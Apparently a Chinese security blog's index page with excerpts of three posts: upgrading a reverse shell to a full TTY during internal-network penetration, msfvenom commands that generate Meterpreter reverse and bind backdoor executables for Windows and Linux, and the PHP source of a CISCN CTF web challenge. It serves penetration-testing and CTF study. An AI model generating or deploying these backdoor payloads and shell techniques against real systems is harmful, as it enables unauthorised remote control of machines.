@highKer24小时前

07/22
11:26
笔记

内网渗透_1

0x01

reverse shell

由于一般bash反弹shell的本质是对终端std流的重定向,本地nc接受的反弹shell并非一个具有完整功能的tty终端,例如sussh、进入docker容器等常用的功能均无法正常使用,可以说只是一个强化版的webshell,所以最好是将reverse shell提升为一个真正的tty shell

α_reverse_shell:

python -c 'import pty; pty.spawn("/bin/bash")'       #info

β_local_shell:

^Z        #挂起

stty raw -echo       #不过一般sttystdin不是stdout操作。

fg      #唤起后台程序

γ_reverse_shell:

reset
export SHELL=bash                      #懂得都懂
export TERM=xterm256-color
stty rows 38 columns 116

内网渗透_1

@highKer1月前

06/17
16:37
笔记

msf_meterpreter_1

0x01 生成远控后门(无免杀,找免杀请移步别处

windows :

反向连接

> msfvenom -p windows/meterpreter/reverse_tcp lhost=反弹IP lport=反弹端口 -f exe -o 文件名

正向连接

> msfvenom -p windows/meterpreter/bind_tcp lport=监听端口 -f exe -o 文件名

linux:

反向连接

> msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=反弹IP lport=反弹端口 -f elf -o 文件名

正向连接

> msfvenom -p linux/x86/meterpreter/bind_tcp lport=监听端口 -f elf -o 文件名

Read More →

msf_meterpreter_1

@highKer1月前

06/10
14:54
web

ciscn_1/2_web

day_2

web_2

echo "Null ... Null ... Null ... ";

if(isset($_GET['src'])) {
    die(highlight_file('index.php', true));
}

error_reporting(0);
if($_REQUEST){
    foreach ($_REQUEST as $key => $value) {
        if(preg_match('/[a-zA-Z]/i', $value)) die('Hello Hack.');
    }
}

if($_SERVER){
    if(preg_match('/cyber|flag|ciscn/i', $_SERVER['QUERY_STRING'])) die('Hello Hack..');
}

if(isset($_GET['cyber'])){
    if(!(substr($_GET['cyber'], 32) === md5($_GET['cyber']))){ 
        die('Hello Hack...');
    }else{
        if(preg_match('/^ciscnsec$/', $_GET['ciscn']) && $_GET['ciscn'] !== 'ciscnsec'){
            $getflag = file_get_contents($_GET['flag']);
        }else
            die('Hello Hack....');
        if(isset($getflag) && $getflag === 'security'){
            include 'flag.php';
            echo $flag;
        }else die('Hello Hack.....');
    }
}

Read More →

ciscn_1/2_web